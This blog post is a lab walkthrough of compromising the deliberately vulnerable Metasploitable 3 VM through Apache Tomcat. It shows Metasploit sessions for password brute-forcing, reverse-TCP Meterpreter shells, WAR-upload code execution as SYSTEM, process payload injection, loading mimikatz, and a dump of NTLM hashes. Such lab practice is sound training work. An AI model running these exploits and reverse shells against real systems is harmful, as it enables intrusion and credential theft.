Saturday, January 21, 2017

Metasploitable 3 - Exploiting Tomcat

Metasploitable 3


Exploiting Tomcat


If you remember, this are the services that NMAP found running on metasploitable 3, on TCP port 8282 there's a Apache Tomcat server running and that's the one I'll exploit for this post.

Services
========

host         port   proto  name          state  info
----         ----   -----  ----          -----  ----
10.20.10.23  21     tcp    ftp           open   Microsoft ftpd
10.20.10.23  22     tcp    ssh           open   OpenSSH 7.1 protocol 2.0
10.20.10.23  80     tcp    http          open   Microsoft-IIS/7.5 ( Powered by ASP.NET )
10.20.10.23  161    udp    snmp          open   SNMPv1 server public
10.20.10.23  445    tcp    smb           open
10.20.10.23  1617   tcp    nimrod-agent  open
10.20.10.23  3000   tcp    http          open   WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)
10.20.10.23  4848   tcp    https         open   Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23  5985   tcp    http          open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.20.10.23  5986   tcp    http          open
10.20.10.23  8020   tcp    http          open   Apache httpd
10.20.10.23  8022   tcp    http          open   Apache Tomcat/Coyote JSP engine 1.1
10.20.10.23  8027   tcp                  open
10.20.10.23  8080   tcp    http          open   Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23  8282   tcp    http          open   Apache-Coyote/1.1
10.20.10.23  8383   tcp    https         open   Apache httpd
10.20.10.23  8484   tcp    http          open   Jetty winstone-2.8
10.20.10.23  8585   tcp    http          open   Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2 ( Powered by PHP/5.3.10 )
10.20.10.23  9200   tcp    http          open   Elasticsearch REST API 1.1.1 name: Mammomax; Lucene 4.7
10.20.10.23  9800   tcp    http          open
10.20.10.23  49153  tcp    msrpc         open   Microsoft Windows RPC
10.20.10.23  49154  tcp    msrpc         open   Microsoft Windows RPC
10.20.10.23  49263  tcp                  open
10.20.10.23  49264  tcp    tcpwrapped    open

When I use my browser I can confirm it's a Apache Tomcat and it's showing the default web site with a link to the manager webapp.

Apache Tomcat's default web site with manager webapp link
Clicking on the link shows me a dialog box requesting Authentication.

Authentication Request for /manager/html

After failing several combinations of usernames and passwords to login, I clicked on the Cancel button and find a 401 Unauthorized message disclosing information about where to find credentials for the web manager app.


Authentication fails with a 401 message and Disclosure of Information


It seems the credentials can be found in a conf/tomcat-users.xml file somewhere in the file system.

First, let's try a simple brutforce using metasploit to see if we can guess the username and password from the built-in word lists.


msf > info auxiliary/scanner/http/tomcat_mgr_login

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC <mc@metasploit.com>
  Matteo Cantoni <goony@nothink.org>
  jduck <jduck@metasploit.com>

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
  PASSWORD                                                                                          no        The HTTP password to specify for authentication
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                                            yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        The HTTP username to specify for authentication
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager
  instance using a specific user/pass.

References:
  https://cvedetails.com/cve/CVE-2009-3843/
  OSVDB (60317)
  http://www.securityfocus.com/bid/37086
  https://cvedetails.com/cve/CVE-2009-4189/
  OSVDB (60670)
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  https://cvedetails.com/cve/CVE-2009-4188/
  http://www.securityfocus.com/bid/38084
  https://cvedetails.com/cve/CVE-2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  https://cvedetails.com/cve/CVE-2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  https://cvedetails.com/cve/CVE-2009-3548/
  OSVDB (60176)
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  https://cvedetails.com/cve/CVE-1999-0502/


I setup my RHOST and RPORT, and run the module

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.20.10.23
RHOSTS => 10.20.10.23
msf auxiliary(tomcat_mgr_login) > set RPORT 8282
RPORT => 8282
msf auxiliary(tomcat_mgr_login) > run

[-] 10.20.10.23:8282 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >

NO LUCK! 👎

OK, plan B... we use the disclosed information from the 401 Unauthorized access web page, it says there's a conf/tomcat-users.xml somewhere, so we use an older exploit to go look for it.

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Creating JSP stager
[*] Uploading JSP stager Oynza.jsp...
[*] Executing stager...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Meterpreter session 3 opened (10.23.10.200:4444 -> 10.20.10.23:50324) at 2017-01-20 22:26:44 -0500
[+] Deleted ../webapps/DesktopCentral/jspf/Oynza.jsp

meterpreter > info
Usage: info <module>

Prints information about a post-exploitation module

meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > pwd
C:\ManageEngine\DesktopCentral_Server\bin
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > search -f tomcat-users.xml
Found 3 results...
    c:\ManageEngine\DesktopCentral_Server\conf\tomcat-users.xml (70 bytes)
    c:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf\tomcat-users.xml (2309 bytes)
    c:\vagrant\resources\apache_struts\tomcat-users.xml (2309 bytes)

meterpreter > cat /Program\ Files/Apache\ Software\ Foundation/tomcat/apache-tomcat-8.0.33/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
...
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>

</tomcat-users>

Just like the 401 Page said, there's a manager gui role setup with a username and password in clear text, sploit/sploit
Now I have a gui managers credentials and can try to get a meterpreter with another exploit.
msf auxiliary(tomcat_mgr_login) > info exploit/multi/http/tomcat_mgr_upload

       Name: Apache Tomcat Manager Authenticated Upload Code Execution
     Module: exploit/multi/http/tomcat_mgr_upload
   Platform: Java, Linux, Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-11-09

Provided by:
  rangercha

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Universal
  2   Windows Universal
  3   Linux x86

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  HttpPassword                   no        The password for the specified username
  HttpUsername                   no        The username to authenticate as
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST         10.20.10.23      yes       The target address
  RPORT         80               yes       The target port
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
  VHOST                          no        HTTP server virtual host

Payload information:

Description:
  This module can be used to execute a payload on Apache Tomcat
  servers that have an exposed "manager" application. The payload is
  uploaded as a WAR archive containing a jsp application using a POST
  request against the /manager/html/upload component. NOTE: The
  compatible payload sets vary based on the selected target. For
  example, you must select the Windows target to use native Windows
  payloads.

References:
  https://cvedetails.com/cve/CVE-2009-3843/
  OSVDB (60317)
  https://cvedetails.com/cve/CVE-2009-4189/
  OSVDB (60670)
  https://cvedetails.com/cve/CVE-2009-4188/
  http://www.securityfocus.com/bid/38084
  https://cvedetails.com/cve/CVE-2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  https://cvedetails.com/cve/CVE-2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  https://cvedetails.com/cve/CVE-2009-3548/
  OSVDB (60176)
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html


msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

Setup username and password found in the tomcat-users.xml

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
HttpPassword => sploit
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
HttpUsername => sploit

Setup metasploitable 3 IP address and Tomcat TCP Port
msf exploit(tomcat_mgr_upload) > set RHOST 10.20.10.23
RHOST => 10.20.10.23

msf exploit(tomcat_mgr_upload) > set RPORT 8282

And exploit!
msf exploit(tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 4MLnXRl...
[*] Executing 4MLnXRl...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Undeploying 4MLnXRl ...
[*] Meterpreter session 4 opened (10.23.10.200:4444 -> 10.20.10.23:50340) at 2017-01-20 23:17:06 -0500

meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter >

Great!, I have a 32bit meterpreter with SYSTEM privileges

Let's get a 64bit meterpreter so I can run other tools like mimikats fully.

I send the meterpreter session to the background so I can use it to inject a second payload
meterpreter > background
[*] Backgrounding session 4...

I used a payload_inject exploit for Windows and set the payload to a reverse TCP 64 bit meterprter

msf exploit(tomcat_mgr_upload) > use exploit/windows/local/payload_inject

msf exploit(payload_inject) > info exploit/windows/local/payload_inject

       Name: Windows Manage Memory Payload Injection
     Module: exploit/windows/local/payload_inject
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-10-12

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
  sinn3r <sinn3r@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Windows

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  NEWPROCESS  false            no        New notepad.exe to inject to
  PID                          no        Process Identifier to inject of process to inject payload.
  SESSION                      yes       The session to run this module on.

Payload information:
  Space: 4096

Description:
  This module will inject a payload into memory of a process. If a
  payload isn't selected, then it'll default to a reverse x86 TCP
  meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  false            no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  false            no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows

Set my local port and local IP address to be used for a listener for the second meterpreter

msf exploit(payload_inject) > set LPORT 4467
LPORT => 4467
msf exploit(payload_inject) > set LHOST 10.23.10.200
LHOST => 10.23.10.200
msf exploit(payload_inject) > sessions

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  4   meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3  10.23.10.200:4444 -> 10.20.10.23:50340 (10.20.10.23)

I tell the exploit to use my background 32bit session for the injection

msf exploit(payload_inject) > set session 4
session => 4
msf exploit(payload_inject) > run

[*] Started reverse TCP handler on 10.23.10.200:4467
[*] Running module against METASPLOITABLE3
[-] PID  does not actually exist.
[*] Launching notepad.exe...
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 6068
[*] Sending stage (1189423 bytes) to 10.20.10.23
[*] Meterpreter session 5 opened (10.23.10.200:4467 -> 10.20.10.23:50345) at 2017-01-20 23:30:34 -0500

meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows 👍
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > mimikatz... TO BE CONTINUED ... 😁

Also the tomcat credentials have been added to my creds table automatically in case I need them again

Credentials
===========

host         origin       service          public            private                                                            realm  private_type
----         ------       -------          ------            -------                                                            -----  ------------
10.20.10.23  10.20.10.23  8022/tcp (http)  admin             admin                                                                     Password
10.20.10.23  10.20.10.23  445/tcp (smb)    administrator     aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    guest             aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    vagrant           aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    sshd              aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    sshd_server       aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    leah_organa       aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    luke_skywalker    aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    han_solo          aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    artoo_detoo       aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    c_three_pio       aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    ben_kenobi        aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    darth_vader       aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    anakin_skywalker  aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    jarjar_binks      aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    lando_calrissian  aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    boba_fett         aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    jabba_hutt        aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    greedo            aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    chewbacca         aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8         NTLM hash
10.20.10.23  10.20.10.23  445/tcp (smb)    kylo_ren          aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001         NTLM hash
10.20.10.23               445/tcp (smb)    c_three_pio       pr0t0c0l:12                                                               Password
10.20.10.23               445/tcp (smb)    vagrant           vagrant:5                                                                 Password
10.20.10.23               445/tcp (smb)    administrator     vagrant:3                                                                 Password
10.20.10.23  10.20.10.23  8282/tcp (http)  sploit            sploit                                                                    Password

BTW, I manged to crack a couple of more passwords, I'll show later. I really want to keep playing with JtR to get them all.

No comments:

Post a Comment